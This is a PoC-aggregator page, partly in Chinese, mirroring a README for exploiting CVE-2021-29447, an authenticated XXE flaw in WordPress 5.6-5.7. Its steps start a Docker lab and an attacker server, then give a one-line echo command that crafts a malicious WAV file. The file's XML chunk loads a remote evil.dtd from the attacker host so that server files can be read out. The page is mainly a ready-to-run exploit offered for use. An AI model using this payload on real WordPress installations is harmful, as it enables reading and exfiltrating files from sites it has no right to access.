POC详情: 58e67546959eeb3d6c13def785b6401eb27a801d

来源
关联漏洞
标题: WordPress 代码问题漏洞 (CVE-2021-29447)
描述:WordPress是WordPress(Wordpress)基金会的一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。 WordPress 存在代码问题漏洞,攻击者可利用该漏洞在成功的XXE攻击中可以访问内部文件。
描述
WordPress - Authenticated XXE (CVE-2021-29447)
介绍
# WordPress 5.6-5.7 - Authenticated (Author+) XXE (CVE-2021-29447)

## Using

### Step1. Run WordPress

```
$ make up-wp
```

### Step2. Run Attacker web server

```
$ make up-mal
```

### Step3. Generate malicious WAV file

#### Without wavefile npm (Recommend)

```
$ echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '"'"'http://host.docker.internal:8001/evil.dtd'"'"'>%remote;%init;%trick;] >\x00'> malicious.wav
```

#### With wavefile npm

```
$ make make-wav
```

### Step4. Login to WordPress & Upload WAV file to New Media

<img width="400" src="https://user-images.githubusercontent.com/3177297/115130382-53cdd100-a02a-11eb-9d7a-d68380c7439a.png">

### Step5. decode

<img width="500" src="https://user-images.githubusercontent.com/3177297/115130103-a35ecd80-a027-11eb-94e4-eea83ed4200f.png">

<img width="500" src="https://user-images.githubusercontent.com/3177297/115130112-b40f4380-a027-11eb-85ec-a9f254dd342b.png">

<img width="500" src="https://user-images.githubusercontent.com/3177297/115130108-ab1e7200-a027-11eb-9bc4-70a1a7531c0d.png">

## References

- [WordPress 5.6-5.7 - Authenticated XXE Within the Media Library Affecting PHP 8 Security Vulnerability](https://wpscan.com/vulnerability/cbbe6c17-b24e-4be4-8937-c78472a138b5)
文件快照

[4.0K] /data/pocs/58e67546959eeb3d6c13def785b6401eb27a801d ├── [4.0K] attacker │   ├── [ 44] decryption.php │   ├── [4.0K] malicious_wav │   │   ├── [ 412] index.js │   │   ├── [ 54] package.json │   │   └── [ 818] package-lock.json │   └── [4.0K] www │   └── [ 193] evil.dtd ├── [ 490] docker-compose.yml ├── [ 377] Makefile └── [1.3K] README.md 3 directories, 8 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。